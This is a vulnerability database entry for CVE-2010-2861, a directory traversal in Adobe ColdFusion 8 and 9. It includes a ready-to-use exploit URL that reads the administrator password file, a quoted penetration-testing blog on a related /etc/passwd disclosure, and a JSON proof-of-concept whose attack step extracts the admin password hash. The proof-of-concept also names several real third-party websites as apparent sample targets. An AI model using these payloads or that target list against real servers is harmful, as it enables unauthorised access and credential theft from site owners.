Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)

2014-07-0100:00:00

black_mia

www.seebug.org

134

0.971 High

EPSS

Percentile

99.7%

JSON

Adobe ColdFusion <=8.0

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.propertiesen

server替换成目标网站即可

Update:2017-04-28

This blog was written by Scott White, Senior Principal Security Consultant, Web Application Team Lead – TrustedSec

TL;DR:
A publicly undisclosed pre-auth local file disclosure path in older Adobe ColdFusion products (8.0, 8.0.1, 9.0, 9.0.1 and earlier versions) exists at /CFIDE/debug/cf_debugFr.cfm?userPage=…/…/etc/hosts

During a recent penetration test, a web site utilizing cfm pages was identified and when checking for the well-known administrative interface url of /CFIDE/administrator/ for access it was found to be restricted. Further investigation revealed that the ColdFusion Debugging Panel was accessible at /debug/cf_debugFr.cfm despite known /CFIDE/Administrator/ resources being restricted. A simple Google search revealed a “userPage” query string parameter that appeared to use a relative path to resources on sites that hosted them:

Publicly known paths and vulnerabilities (https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/coldfusion_scanner.rb) were not fruitful.

Despite the path being known and disclosing paths when debugging is enabled, efforts were made using common web application testing techniques to identify other potential vulnerabilities or avenues for attack. In our target environment, an outdated ColdFusion 9 instance was running on Linux. Although this version was old and likely tested by many others in the past, a path traversal that could disclose the contents of local files on the system was discovered.

/CFIDE/debug/cf_debugFr.cfm?userPage=…/…/etc/hosts

A quick search online revealed no information about this vulnerability. Could this be a 0-day? ColdFusion 2016 was downloaded and tested but the issue appeared to have been patched. No other information was easily found without some deep digging; a report was submitted to Adobe’s bug bounty program (https://hackerone.com/adobe). When comparing HTML source of the vulnerable client page versus the ColdFusion 2016 test environment, the following differences were noted:

ColdFusion 2016: …/…/etc/passwd

ColdFusion v9: %2E%2E%2F%2E%2E%2Fetc%2Fpasswd

Clearly an update was made to the code somewhere to patch the vulnerability. Examination of the ColdFusion 2016 source code confirms encoding was being performed:

Adobe responded to the bug bounty report and stated that the vulnerability was previously identified and covered under CVE-2010-2861 which was reviewed prior to submitting the issue. It appears that Adobe chose to patch the issue(s) without releasing full details. Adobe’s security bulletin is located at http://www.adobe.com/support/security/bulletins/apsb10-18.html and lists affected versions as being ColdFusion 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions for Windows, Macintosh and UNIX. Information to address the bulletin can be found at https://helpx.adobe.com/coldfusion/kb/coldfusion-security-hot-fix-bulletin.html


                                                {
    "pocInfo": {
        "vulID": "71470",
        "version": "1",
        "name": "Adobe ColdFusion - 跨目录及管理员凭证泄露漏洞",
        "protocol": "http",
        "author": "Jeremie",
        "references": ["http://www.sebug.net/vuldb/ssvid-71470"],
        "appName": "ColdFusion",
        "appVersion" : "8.0",
        "createDate": "1442624949",
        "updateDate": "1442624949",
        "appPowerLink": "http://www.adobe.com/products/coldfusion-family.html",
        "vulDate": "1281715200",
        "vulType": "Information Disclosure",
        "desc" :"Adobe ColdFusion存在一个跨目录及管理员凭证泄露漏洞，导致可获取管理员加密的凭证值，经过转换即可以以管理员身份登录后台。",
        "samples": ["http://powercampus.cuea.edu", "http://cosdashboard.xd.ndorange.com","http://www.smc.edu.au","http://www.pbrmexico.com","http://www.buythiscar.co.nz","http://www.zoo.ch"]
    },

    "pocExecute":{
        "verify": [
            {
                "step": "0",
                "method": "get",
                "vulPath": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
                "params": "",
                "necessary": "",
                "headers": {},
                "status": "200",
                "match": {
                    "regex": ["encrypted=true"]
                }
            }
        ],
        "attack": [
            {
                "step": "0",
                "method": "get",
                "vulPath": "/CFIDE/administrator/enter.cfm",
                "params": "locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en",
                "necessary": "",
                "headers": {},
                "status": "200",
                "match": {
                    "regex": ["encrypted=true"],
                    "time":""
                },
                "result": {
                    "DBInfo": {
                        "Encrypted password": "<regex>[0-9A-F]{40}"
                    }
                }
            }
        ]
    }
}